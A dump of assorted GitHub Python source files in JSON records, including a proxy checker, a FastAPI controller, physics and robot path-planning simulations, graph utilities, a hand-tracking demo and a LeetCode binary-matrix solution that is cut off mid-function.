save_proxy_list(proxies, os.path.join(CONFIG['storage_path'], CONFIG['temp_file_with_all_proxies']))\n check_proxies_main([\"-file\", os.path.join(CONFIG['storage_path'], CONFIG['temp_file_with_all_proxies']),\n \"-url\", CONFIG['url_for_check'],\n \"-timeout\", CONFIG['timeout'],\n \"-threads\", CONFIG['threads']\n ])\n print(\"See result.txt for check new proxy list\")\n","repo_name":"nekey/stackoverflowscrapper","sub_path":"proxy_list/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25380001077","text":"from userService.v1.models import User\r\nfrom companyService.v1.models import Company, Company_User\r\nfrom fastapi import Depends\r\nfrom config.database import database\r\nfrom typing import Dict\r\nfrom sqlalchemy.sql.expression import exists, select, insert, update, and_\r\n\r\n\r\nclass CompanyController:\r\n async def create_company(self, company: Dict) -> int:\r\n query = insert(Company).values(**company)\r\n return await database.execute(query)\r\n\r\n async def invite_representative(self, company: int, user: int):\r\n query = insert(Company_User).values(company=company, user=user)\r\n return await database.execute(query)\r\n\r\n async def get_invite(self, company: int, user: int):\r\n query = select(Company_User).where(\r\n and_(Company_User.company == company, Company_User.user == user)\r\n )\r\n return await database.fetch_one(query)\r\n\r\n async def accept_invite(self, company: int, user: int):\r\n query = (\r\n update(Company_User)\r\n .values({\"accepted\": True})\r\n .where(\r\n and_(Company_User.company == company, Company_User.user == user)\r\n )\r\n )\r\n return await database.execute(query)\r\n\r\n @staticmethod\r\n async def check_invite(company: int, user: int):\r\n query = select(Company_User).where(\r\n and_(\r\n Company_User.company == company,\r\n Company_User.user == user,\r\n Company_User.accepted == False,\r\n )\r\n )\r\n query = select(exists(query))\r\n return await database.execute(query)\r\n\r\n @staticmethod\r\n async def check_related(company: int, user: int):\r\n query = select(Company_User).where(\r\n and_(\r\n Company_User.company == company,\r\n Company_User.user == user,\r\n Company_User.accepted == True,\r\n )\r\n )\r\n query = select(exists(query))\r\n return await database.execute(query)\r\n\r\n @staticmethod\r\n async def get_company_by_id(id: int) -> Company:\r\n query = select(Company).where(Company.id == id)\r\n return await database.fetch_one(query)\r\n\r\n @staticmethod\r\n async def check_company_by_id(id: int) -> bool:\r\n query = select(Company).where(Company.id == id)\r\n return await database.execute(select(exists(query)))\r\n","repo_name":"ghimire007/omnecal","sub_path":"companyService/v1/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21529965481","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 20 13:33:31 2016\n\n@author: Hugh\n\"\"\"\n\nimport scipy as sp\nimport numpy as np\nimport pylab as pl\nimport scipy.integrate as spi\nimport matplotlib.pyplot as plt\n\nG=6.67*(10**-11)\nM=9.98*10**12\nM_small=4.22*10**12\nM_large=5.76*10**12\nR_small=1100\nR_large=1220\nm=260\nrestitution=0.7\n\ndef f(r,t):\n\n xx=r[0]\n vx=r[1]\n yy=r[2]\n vy=r[3]\n ax=-((G*M_small*(r[0]-1659)/((r[0]-1659)**2 + r[2]**2)**1.5)+(G*M_large*(r[0]+660)/((r[0]+660)**2 + r[2]**2)**1.5))\n ay=-((G*M_small*r[2]/((r[0]-1659)**2 + r[2]**2)**1.5)+(G*M_large*r[2]/((r[0]+660)**2 + r[2]**2)**1.5))\n return [vx,ax,vy,ay]\n\nt=sp.linspace(0.,500000.,50000)\nvi=-0.599\nvj=-0.03\nx0=22473\ny0=1100\nxx0=[x0,vi,y0,vj]\n\n\nsoln=spi.odeint(f,xx0,t)\nx=soln[:,0]\nv1=soln[:,1]\ny=soln[:,2]\nv2=soln[:,3]\n\n\nr_small=((x-1659)**2+y**2)**0.5\nr_large=((x+660)**2+y**2)**0.5\n\ndef cut(m,n):\n i=0\n while m[i]-n > 0:\n i+=1\n i=i-1\n xa=x[:i+1]\n ya=y[:i+1]\n return [xa,ya,i]\n\nx_1collision=cut(r_small,R_small)[0][-1]\ny_1collision=cut(r_small,R_small)[1][-1]\n \nif min(r_small) < R_small: \n i=cut(r_small,R_small)[2]\n Positionx_collision=x[i]-1659\n Positiony_collision=y[i]\n Calculation=((v1[i]*Positionx_collision)+(v2[i]*Positiony_collision))/(Positionx_collision**2+Positiony_collision**2)\n Vx_normal=Calculation*Positionx_collision\n Vy_normal=Calculation*Positiony_collision\n Vx_tangent=v1[i]-Vx_normal\n Vy_tangent=v2[i]-Vy_normal\n Vx_aftercollision=Vx_tangent-Vx_normal*restitution\n Vy_aftercollision=Vy_tangent-Vy_normal*restitution\n xx0_new=[x[i],Vx_aftercollision,y[i],Vy_aftercollision]\n \n t_new=t+t[i]\n soln_new=spi.odeint(f,xx0_new,t_new)\n \n x_new=soln_new[:,0]\n vx_new=soln_new[:,1]\n y_new=soln_new[:,2]\n vy_new=soln_new[:,3]\n r_small_new=((x_new-1659)**2+y_new**2)**0.5\n \n \n \n \n if min(r_small_new) 0:\n i+=1\n i=i-1\n x_new=x_new[:i+1]\n y_new=y_new[:i+1]\n \n \n \n x=np.concatenate((cut(r_small,R_small)[0],x_new),axis=0)\n y=np.concatenate((cut(r_small,R_small)[1],y_new),axis=0)\n \n \n Positionx_collision=x_new[i]-1659\n Positiony_collision=y_new[i]\n Calculation=((vx_new[i]*Positionx_collision)+(vy_new[i]*Positiony_collision))/(Positionx_collision**2+Positiony_collision**2)\n Vx_normal=Calculation*Positionx_collision\n Vy_normal=Calculation*Positiony_collision\n Vx_tangent=vx_new[i]-Vx_normal\n Vy_tangent=vy_new[i]-Vy_normal\n Vx_aftercollision=Vx_tangent-Vx_normal*restitution\n Vy_aftercollision=Vy_tangent-Vy_normal*restitution\n xx0_new=[x_new[i],Vx_aftercollision,y_new[i],Vy_aftercollision]\n \n \n t_new=t+t_new[i]\n soln_new=spi.odeint(f,xx0_new,t_new)\n x_new=soln_new[:,0]\n vx_new=soln_new[:,1]\n y_new=soln_new[:,2]\n vy_new=soln_new[:,3]\n r_small_new=((x_new-1659)**2+y_new**2)**0.5\n \n if min(r_small_new)= 0:\n i+=1\n \n x_new=x_new[:i+1]\n y_new=y_new[:i+1]\n \n \n x=np.concatenate((x,x_new),axis=0)\n y=np.concatenate((y,y_new),axis=0)\n print (2*sp.pi*R_small*sp.arcsin(0.5*((x_1collision-x_new[-1])**2+(y_1collision-y_new[-1])**2)**0.5/R_small)/sp.pi)\n \n \n\npl.figure(1)\npl.plot(x,y)\ncircle1=pl.Circle((1659,0),radius=R_small,color='r')\ncircle2=pl.Circle((-660,0),radius=R_large,color='r')\nplt.gca().add_patch(circle1)\nplt.gca().add_patch(circle2)\npl.axis('equal')\npl.title(\"Y Distance v.s X Distance\")\npl.xlabel(\"X Distance (m)\")\npl.ylabel(\"Y Distance (m)\")\n\n\n\n\n","repo_name":"HughHuang96824/Computational-Lab-Y1","sub_path":"The Rosetta Mission.py","file_name":"The Rosetta Mission.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1558507090","text":"import numpy as np\nfrom utils import get_collision_fn_PR2, load_env, execute_trajectory, draw_sphere_marker\nfrom pybullet_tools.utils import connect, disconnect, wait_if_gui, load_pybullet\n\n\nnp.random.seed(1)\nstate_names = ('x', 'y', 'theta', 'u', 'v', 'w')\nstate_limits = {'x': (-4.75, 4.75), 'y': (-4.75, 4.75), 'theta': (-np.pi, np.pi), 'u': (-0.5, 0.5),\n 'v': (-0.5, 0.5), 'w': (-0.3, 0.3)}\n\ndef dynamics(now_state, inputs):\n # state space(x,y,theta,u,v,w)\n m = 5 # mass\n I = 5 # inertia tensor\n dt = 0.15 # 0.075\n x = now_state[0]\n y = now_state[1]\n theta = now_state[2]\n u = now_state[3]\n v = now_state[4]\n w = now_state[5]\n fx = inputs[0]\n fy = inputs[1]\n ax = fx / m\n ay = fy / m\n alpha = inputs[2] / I\n next_u = u + ax * dt\n next_v = v + ay * dt\n next_w = w + alpha * dt\n u = next_u\n v = next_v\n w = next_w\n next_x = x + (u * np.cos(theta) - v * np.sin(theta)) * dt # in the fixed frame\n next_y = y + (u * np.sin(theta) + v * np.cos(theta)) * dt # in the fixed frame\n next_theta = theta + w * dt # in the fixed frame\n while next_theta < -np.pi:\n next_theta = next_theta + 2 * np.pi\n while next_theta > np.pi:\n next_theta = next_theta - 2 * np.pi\n return (next_x, next_y, next_theta, next_u, next_v, next_w)\n\n\ndef taskspace(config):\n return (config[0], config[1], config[2])\n\n\ndef limit_check(config):\n for i in range(6):\n if (config[i] < state_limits[state_names[i]][0] or config[i] > state_limits[state_names[i]][1]) and i != 2:\n return False\n return True\n\n\ndef distance(now, next):\n distance_temp = 0\n weights = [4, 4, 3, 2, 2, 1]\n for i in range(6):\n if i != 2:\n distance_temp = distance_temp + (weights[i] * abs(next[i] - now[i]) ** 2)\n else:\n distance_temp = distance_temp + (weights[i] * (theta_diff(next[i], now[i])) ** 2)\n return np.sqrt(distance_temp)\n\n\n\n# a and b are angles in radians within [-pi, pi], angle_diff returns the angle difference within [0 , pi][-pi, pi]\ndef theta_diff(t1, t2):\n diff = t1 - t2\n while diff < -np.pi:\n diff = diff + 2 * np.pi\n while diff > np.pi:\n diff = diff - 2 * np.pi\n return abs(diff)\n\n\ndef achieve(config1, config2):\n dx = abs(config2[0] - config1[0])\n dy = abs(config2[1] - config1[1])\n dtheta = theta_diff(config2[2], config1[2])\n du = abs(config2[3] - config1[3])\n dv = abs(config2[4] - config1[4])\n dw = abs(config2[5] - config1[5])\n if (np.sqrt(\n dx ** 2 + dy ** 2) < 0.125) and (dtheta < 0.15) and (np.sqrt(du ** 2 + dv ** 2) < 0.2) and dw < 0.2:\n return True\n return False\n\n\ndef get_rand(goal_config, goal_bias):\n prob = np.random.random(1) # To make probability of picking the goal node instead of the random one.\n if prob <= goal_bias:\n return goal_config\n else:\n q_random = [0, 0, 0, 0, 0, 0]\n for i in range(len(state_limits)):\n temp_low_lim, temp_up_lim = state_limits[state_names[i]]\n q_random[i] = round(temp_low_lim + (temp_up_lim - temp_low_lim) * np.random.random(), 2)\n return (q_random[0], q_random[1], q_random[2], q_random[3], q_random[4], q_random[5])\n\n\ndef get_near(explored_nodes, q_random):\n d_list = []\n for node in explored_nodes:\n d_list.append(distance(node, q_random))\n min_ind = np.argmin(d_list)\n return explored_nodes[min_ind]\n\n\n# TODO: Define primitives\ndef get_new(near, random, num):\n p1 = (1.0, 0.0, 0.0) # Fx\n p2 = (0.0, 0.0, -1.0) # rotate clockwise\n p3 = (0.0, 0.0, 1.0) # rotate counterclockwise\n p4 = (-1.0, 0.0, 0.0) # Fx\n p5 = (0.0, 1.0, 0.0) # Fy\n p6 = (0.0, -1.0, 0.0) # Fy\n p7 = (1.0, 1.0, 0.0) # Fx and Fy\n p8 = (1.0, -1.0, 0.0) # Fx and Fy\n p9 = (-1.0, 1.0, 0.0) # Fx and Fy\n p10 = (-1.0, -1.0, 0.0) # Fx and Fy\n p11 = (1.0, 0.0, 1.0) # Fx and rotate\n p12 = (1.0, 0.0, -1.0) # Fx and rotate\n p13 = (-1.0, 0.0, 1.0) # Fx and rotate\n p14 = (-1.0, 0.0, -1.0) # Fx and rotate\n p15 = (0.0, 1.0, 1.0) # rotate and Fy\n p16 = (0.0, 1.0, -1.0) # rotate and Fy\n p17 = (0.0, -1.0, 1.0) # rotate and Fy\n p18 = (0.0, -1.0, -1.0) # rotate and Fy\n primitive = [p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13, p14, p15, p16, p17, p18]\n dist = []\n for i in range(num):\n dist.append(distance(dynamics(near, primitive[i]), random))\n min_id = np.argmin(dist)\n return dynamics(near, primitive[min_id])\n\n\ndef path_quality(ex, p):\n explored_node = len(ex)\n quality_1 = 0\n quality_2 = 0\n r = 0.3*np.sqrt(2)\n node_num = len(p)\n for i in range(node_num-1):\n dist_temp_2 = np.sqrt((p[i+1][0]-p[i][0])**2 + (p[i+1][1]-p[i][1])**2 + r * theta_diff(p[i+1][2], p[i][2]))\n dist_temp_1 = np.sqrt((p[i+1][0]-p[i][0])**2 + (p[i+1][1]-p[i][1])**2)\n quality_1 = quality_1 + dist_temp_1\n quality_2 = quality_2 + dist_temp_2\n return explored_node, node_num, np.sqrt(quality_1), np.sqrt(quality_2)\n\n\n# RRT-Connect\ndef rrt_connect(start_config, goal_config, collision_fn, prim_num):\n path = []\n config_path = []\n #start_time = time.time()\n goal_bias = 0.1 # 10%\n root = -1\n explored = [start_config]\n parent = {} # a dictionary key: tuple(a config), value: tuple(parent's config)\n parent[start_config] = root\n collision_times = 0\n finished = 0\n\n while finished == 0:\n random_finished = 0\n while random_finished == 0:\n random_config = get_rand(goal_config, goal_bias)\n if collision_fn(taskspace(random_config)) == False and limit_check(\n random_config) == True: # hit an obstacle\n random_finished = 1\n near_config = get_near(explored, random_config)\n\n connect_times = 0\n while connect_times < 120: # to prevent the random sample is too far away\n # check if the near node hit obstacle or out of limit\n if collision_fn(taskspace(near_config)) == True or limit_check(near_config) == False:\n collision_times = collision_times + 1\n break # get random node again\n\n if achieve(near_config, random_config): # reach the random sample\n new_config = random_config\n if parent.get(new_config) is None:\n parent[new_config] = near_config\n else:\n break\n explored.append(new_config)\n break # get random node again\n\n else: # have not reached the random sample, then extend!\n # print(\"extend\")\n new_config = get_new(near_config, random_config, prim_num)\n\n if collision_fn(taskspace(new_config)) == True or limit_check(new_config) == False: # hit an obstacle\n collision_times = collision_times + 1\n break # get random node again\n if parent.get(new_config) is None:\n parent[new_config] = near_config\n else:\n break\n explored.append(new_config)\n near_config = new_config # the new node then become the nearest node to the random node.\n connect_times = connect_times + 1\n\n if achieve(near_config, goal_config): # then, we check whether we arrive goal now\n current_config = near_config\n for i in range(len(parent)):\n if parent[current_config] != root:\n path.insert(0, taskspace(current_config))\n config_path.insert(0, current_config)\n current_config = parent[current_config]\n finished = 1\n break\n\n #computetime = time.time() - start_time\n #print(\"Planner run time(without drawing the points): \", computetime, \"sec.\")\n return explored, path, config_path, parent\n\ndef main(screenshot=False):\n # initialize PyBullet\n connect(use_gui=False)\n # load robot and obstacle resources\n _, obstacles = load_env('environment.json')\n robot = load_pybullet(\"myrobot.urdf\")\n # define active DoFs\n base_joints = [0, 1, 2]\n collision_fn = get_collision_fn_PR2(robot, base_joints, list(obstacles.values()))\n print()\n print()\n print(\"Building RRT...\")\n print(\"We will show the search trees(blue) and executed path(green) in this program.\")\n print(\"This program is expected to run for 4~10 minutes (incluing drawing paths)...\")\n print()\n start_config = (-4.5, 4.5, 0, 0, 0, 0)\n goal_config = (4.5, -4.5, -np.pi/2, 0, 0, 0)\n #start_time = time.time()\n explored, path, config_path, dictionary = rrt_connect(start_config, goal_config, collision_fn, 18)\n totalnodes, nodenum, quality_eu, quality_plus = path_quality(explored, path)\n print(\"Finish building the RRT!!\")\n #print(\"computation time:\", time.time() - start_time)\n print(\"number of explored nodes:\", totalnodes)\n print(\"number of path nodes:\", nodenum)\n print(\"path quality(euclidean):\", quality_eu)\n print(\"path quality(consider theta):\", quality_plus)\n\n disconnect()\n connect(use_gui=True)\n _, obstacles = load_env('environment.json')\n robot = load_pybullet(\"myrobot.urdf\")\n start_config = (-4.5, 4.5, 0)\n collision_fn(start_config)\n draw_sphere_marker((goal_config[0], goal_config[1], 0.1), 0.15, (1, 0, 0, 1))\n print(\"Start drawing the explored path (Blue)\")\n for path_i in explored:\n draw_sphere_marker((path_i[0], path_i[1], 0.06), 0.05, (0, 0, 1, 1))\n print(\"Start drawing the path (green)\")\n for path_i in path:\n draw_sphere_marker((path_i[0], path_i[1], 0.08), 0.05, (0, 1, 0, 1))\n\n ######################\n print(\"Start executing the path\")\n # Execute planned path\n execute_trajectory(robot, base_joints, path, sleep=0.1)\n # Keep graphics window opened\n wait_if_gui()\n disconnect()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yanglunlai/Kinodynamic-RRT-Path-Planning","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":9981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"70874414941","text":"import matplotlib.pyplot as plt\nimport networkx as nx\nimport operator\nimport inspect\nimport random\nimport sys\nimport os\n\ngraphPath = {\"twitter\":\"networks/twitter/\", \"karate\":\"networks/karate/\"}\n \ndef calculateStatistics(myGraph, name):\n\t\n\ttmp_path = graphPath[name] + \"statistics.txt\"\n\tinfoFile = open(tmp_path, 'w')\n\n\ttotal_number_of_nodes = myGraph.number_of_nodes()\n\tinfoFile.write(\"Nodes \" + str(total_number_of_nodes) + \"\\n\")\n\n\ttotal_number_of_edges = myGraph.number_of_edges()\n\tinfoFile.write(\"Edges: \" + str(total_number_of_edges) + \"\\n\")\n\n\t#pr_directed = nx.pagerank(myGraph, alpha = 0.9)\n\t#pr_directed_sorted = sorted(pr_directed.items(), key = operator.itemgetter(1))[::-1]\n\n\tinfoFile.close()\n\ndef displayGraph(myGraph, path):\n\t#display a subgraph\n\tnodes = myGraph.nodes()\n\ttmp_nodes = random.sample(nodes, 10)\n\tH = myGraph.subgraph(tmp_nodes)\n\tnx.draw(H, pos=nx.spring_layout(H), node_size=2)\n\n\t# tmp_title = path.replace(\"/\", \"\").upper()\n\tplt.show()\n\n\ndef returnTheFolder(path):\n\tif(\"txt\" in path):\n\t\ttmp_path = path.replace(\"dataset.txt\", \"\")\n\telif(\"gml\" in path):\n\t\ttmp_path = path.replace(\"dataset.gml\", \"\")\n\telif(\"mtx\" in path):\n\t\ttmp_path = path.replace(\"dataset.mtx\", \"\")\n\telif(\"csv\" in path):\n\t\ttmp_path = path.replace(\"dataset.csv\", \"\")\n\treturn(tmp_path)\n\ndef readEdgelistFile(path):\n\tgraph_X = nx.read_edgelist(path, nodetype = int, create_using = nx.DiGraph())\n\t\n\treturn(graph_X)\n\ndef createEdgelistFile(path):\n\tgraph_X = nx.DiGraph()\n\tmyFile = open(path)\n\tfor line in myFile:\n\t\ttry:\n\t\t\ttmp_line = line.replace(\"\\n\", \"\").split(\" \")\n\t\t\tsource = int(tmp_line[0])\n\t\t\ttarget = int(tmp_line[1])\n\t\t\tgraph_X.add_edge(source, target)\n\t\texcept:\n\t\t\tprint(\"error\")\n\n\tmyFile.close()\n\n\t'''Write edgelist file'''\n\tnx.write_edgelist(graph_X, returnTheFolder(path) + \"edgelist\")\n\n\treturn(graph_X)\n\ndef returnTheLargestCC(graph):\n\tlargest_cc = max(nx.strongly_connected_component_subgraphs(graph), key=len)\n\treturn(largest_cc)\n\ndef returnGraph(name):\n\ttmp_network_name = graphPath[name] + \"edgelist\"\n\tif(os.path.isfile(tmp_network_name)):\n\t\t''' Read the edgelist file'''\n\t\tgraph_X = readEdgelistFile(graphPath[name] + \"edgelist\")\n\telse:\n\t\t''' Create the edgelist file'''\n\t\tcreateEdgelistFile(graphPath[name] + \"dataset.txt\")\n\t\tgraph_X = readEdgelistFile(graphPath[name] + \"edgelist\")\n\t\n\t''' Return the largest strongly connected component network'''\n\tif(not(name == \"karate\")):\n\t\tgraph_X = returnTheLargestCC(graph_X)\n\treturn(graph_X)\n","repo_name":"cterizi/Modeling-Aggression-Propagation-on-Social-Media","sub_path":"CODE/readGraph.py","file_name":"readGraph.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72675708705","text":"\"\"\"IPX800 Analog Input.\"\"\"\nfrom .ipx800 import IPX800\n\n\nclass AInput:\n \"\"\"Representing an IPX800 Analog Input.\"\"\"\n\n def __init__(self, ipx800: IPX800, analog_id: int) -> None:\n \"\"\"Initialize object.\"\"\"\n self._ipx = ipx800\n self.id = analog_id\n\n @property\n def key(self) -> str:\n \"\"\"Return the key to get the value from API call.\"\"\"\n return f\"A{self.id}\"\n\n @property\n async def value(self) -> float:\n \"\"\"Get Analog Input value.\"\"\"\n params = {\"Get\": \"A\"}\n response = await self._ipx.request_api(params)\n return response[self.key]\n","repo_name":"Aohzan/pypx800","sub_path":"pypx800/ainput.py","file_name":"ainput.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"32145337792","text":"# list of animals\nanimals = ['bear', 'tiger', 'penguin', 'zebra']\nbear = animals[0]\n\nanimals2 = ['bear', 'python', 'peacock', 'kangaroo', 'whale', 'platypus']\n\n\n #The animal at 1. python\n #The 3rd animal. peacock\n #The 1st animal. bear\n #The animal at 3. kangaroo\n #The 5th animal. whale\n #The animal at 2. peacock\n #The 6th animal. platypus\n #The animal at 4. whale\n","repo_name":"rjcmarkelz/python_the_hard_way","sub_path":"exercises/ex34.py","file_name":"ex34.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4054907794","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport six\n\nimport argparse\nfrom cmd import Cmd\nfrom ModelKB import Model\n\n\ndef unicode_text(s):\n if type(s) != six.text_type:\n return s.decode('utf-8')\n return s\n\nclass SeeModelCmd(Cmd):\n def __init__(self, model):\n Cmd.__init__(self)\n self.model = model\n self.k = 20\n\n def do_help(self, arg):\n print(\" Command list:\")\n print(\"\\trole ROLE\\tInspect role matrix\")\n print(\"\\tcalc EXPR\\tCalculate vector\")\n print(\"\\tset K \\tDisplay the top K results (default: 20)\")\n print(\"\\tquit \\tQuit\")\n print()\n\n def do_role(self, role):\n try:\n self.model.show_m(unicode_text(role), self.k)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_comprole(self, comprole):\n try:\n r1, r2 = unicode_text(comprole).split(' ')\n self.model.show_mm(r1, r2, self.k)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_calc(self, expr):\n try:\n self.model.show_v(self.model.calc(unicode_text(expr)), self.k)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_sim(self, s):\n try:\n x, y = unicode_text(s).split(' ~ ')\n print(self.model.calc(x).dot(self.model.calc(y)))\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_set(self, k):\n self.k = int(k)\n\n def do_quit(self, arg):\n raise SystemExit\n\n\ndef main():\n parser = argparse.ArgumentParser(description='See KB embedding model.')\n parser.add_argument('words_file', metavar='VOCAB_ENTITY', type=str,\n help='counts of entities')\n parser.add_argument('roles_file', metavar='VOCAB_RELATION', type=str,\n help='counts of relations')\n parser.add_argument('model_path', metavar='MODEL_PATH', type=str,\n help='path to trained model')\n args = parser.parse_args()\n\n model = Model(args.words_file, args.roles_file, args.model_path)\n\n prompt = SeeModelCmd(model)\n prompt.prompt = '> '\n prompt.cmdloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tianran/glimvec","sub_path":"python/seeModelKB.py","file_name":"seeModelKB.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"70"}
+{"seq_id":"28159486783","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom statsmodels.tsa.arima.model import ARIMA\r\n\r\n# Load CSV file\r\ndata = pd.read_csv(\"applerevenue .csv\", index_col=0, parse_dates=True)\r\n\r\n# Plot revenue data\r\ndata.plot()\r\nplt.show()\r\n\r\n# Fit ARIMA model\r\nmodel = ARIMA(data, order=(1, 1, 1))\r\nmodel_fit = model.fit()\r\n\r\n# Make predictions\r\nstart = len(data)\r\nend = len(data) + 10\r\npredictions = model_fit.predict(start=start, end=end, typ='levels')\r\n\r\n# Plot predictions\r\npredictions.plot()\r\nplt.show()\r\n","repo_name":"tmop14/Apple-Revenue-Next-10-Years","sub_path":"test apple rev.py","file_name":"test apple rev.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39050169666","text":"import fasttext\nimport pickle\nimport pandas as pd\n\n#df_old=pd.read_pickle(\"./covid-tweets-filtered.pkl\")\ndf_old=pd.read_pickle(\"./covid-tweets-ids.pkl\")\nlang_model = fasttext.load_model(\"./lid.176.ftz\")\nlangs = []\ncount=0; \n\ndf_new = pd.DataFrame({'tweet': [], 'tweetid': [], 'timestamp': [], 'lang': [], 'user': []})\n\nfor index, row in df_old.iterrows():\n if (count % 25000 == 0):\n print(count)\n #print(count)\n row['tweet']=row['tweet'].replace('\\n','')\n #print(row['tweet'])\n lang = lang_model.predict(row['tweet'])\n twitter_lang = \"('__label__\" + row['lang'] + \"',)\"\n if (str(lang[0]) == twitter_lang): \n df_new.loc[count]=[row['tweet'], row['tweetid'], row['timestamp'], row['lang'], row['user']]\n count+=1; \n\nprint(count)\ndf_new.to_pickle(\"./covid-tweets-ids-fastext.pkl\")\nprint(df_new.head())\n#print(lang_model.predict(\"Incapaz de distinguir la luna y la cara de esta chica,Las estrellas se ponen nerviosas en el cielo.\")[0])\n","repo_name":"AlexanderTekle/script-tweets","sub_path":"fastText.py","file_name":"fastText.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71577392546","text":"# coding: utf8\nimport json\nfrom urlparse import urljoin\n\n\nclass Asset(object):\n \"\"\"Asset management\"\"\"\n def __init__(self, path, host=None, debug=False):\n self.path = path\n self._stats = {}\n self.host = host\n self.debug = debug\n\n @property\n def stats(self):\n _stats = self._stats\n if not _stats:\n with open(self.path) as f:\n _stats = json.loads(f.read())\n\n if not self.debug:\n self._stats = _stats\n return _stats\n\n def get(self, name):\n if not self.host:\n return self.stats.get(name, '')\n return urljoin(self.host, self.stats.get(name, ''))\n","repo_name":"gfreezy/pushpin","sub_path":"pushpin/views/libs/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10961095518","text":"#importing the required modules\n\nimport cv2\nimport time #to check the frame rate\nimport mediapipe as mp\n\n#Creating the video object\ncap = cv2.VideoCapture(0)\n\n#A formality to before using this module\nmpHands = mp.solutions.hands\n\n#Creating object called Hands\nhands = mpHands.Hands()\n\n#Module used for drawing lines between the landmarks\nmpDraw = mp.solutions.drawing_utils\n\n#Tracking prev and current time for tracking fps\npTime = 0\ncTime = 0\n\n\nwhile True:\n\n success, img = cap.read()\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #Converting the channel of the img from BGR to RGB\n results = hands.process(imgRGB)\n\n #Checking if something is detected or not\n print(results.multi_hand_landmarks)\n\n #Extracting landmarks of multiple hands if present\n if results.multi_hand_landmarks:\n for handlms in results.multi_hand_landmarks:\n for id, lm in enumerate(handlms.landmark):\n\n #print(id, lm)\n h, w, c = img.shape # height, weidth, channel of the img\n cx, cy = int(lm.x * w), int(lm.y * h) # finding the positions in pixel instead of ratios\n print(id, cx, cy)\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED) # Drawing the circle\n\n # we are using img not imgRGB because we are displaying BGR image\n mpDraw.draw_landmarks(img, handlms, mpHands.HAND_CONNECTIONS) # `mpHands.HAND_CONNECTIONS` : draws the connections\n\n\n cTime = time.time() # Gives us the current time\n fps = 1/(cTime - pTime)\n pTime = cTime\n\n #Displaying on the screen\n cv2.putText(img, str(int(fps)), (10, 70),\n cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)\n\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)","repo_name":"yashgosa/hand_tracking","sub_path":"hand_tracking_minimum.py","file_name":"hand_tracking_minimum.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"12242754003","text":"'''\nA binary matrix means that all elements are 0 or 1. For each individual row of the matrix,\nthis row is sorted in non-decreasing order.\nGiven a row-sorted binary matrix binaryMatrix, return leftmost column index(0-indexed) with at least a 1 in it.\nIf such index doesn't exist, return -1.\nYou can't access the Binary Matrix directly. You may only access the matrix using a BinaryMatrix interface:\n- BinaryMatrix.get(row, col) returns the element of the matrix at index (row, col) (0-indexed).\n- BinaryMatrix.dimensions() returns a list of 2 elements [rows, cols], which means the matrix is rows * cols.\n\nSubmissions making more than 1000 calls to BinaryMatrix.get will be judged Wrong Answer.\nAlso, any solutions that attempt to circumvent the judge will result in disqualification.\n'''\nfrom leetcode import *\n\n# This is for testing purposes only!!\nclass BinaryMatrix:\n def __init__(self, mat):\n self.mat = mat\n def get(self, row: int, col: int) -> int:\n return self.mat[row][col]\n def dimensions(self) -> List[int]:\n return [len(self.mat), len(self.mat[0])]\n\n# Time: O(rows * log(cols)), Space: O(1).\ndef leftmost_column_with_one(binaryMatrix: 'BinaryMatrix') -> int:\n rows, cols = binaryMatrix.dimensions()\n min_one_col_ind = cols\n for i in range(rows):\n # Perform binary search on the row to find the first 1:\n start = 0\n end = cols - 1\n one_col_ind = -1\n while start <= end:\n mid = (start + end) // 2\n # Go to the right to see if there is a 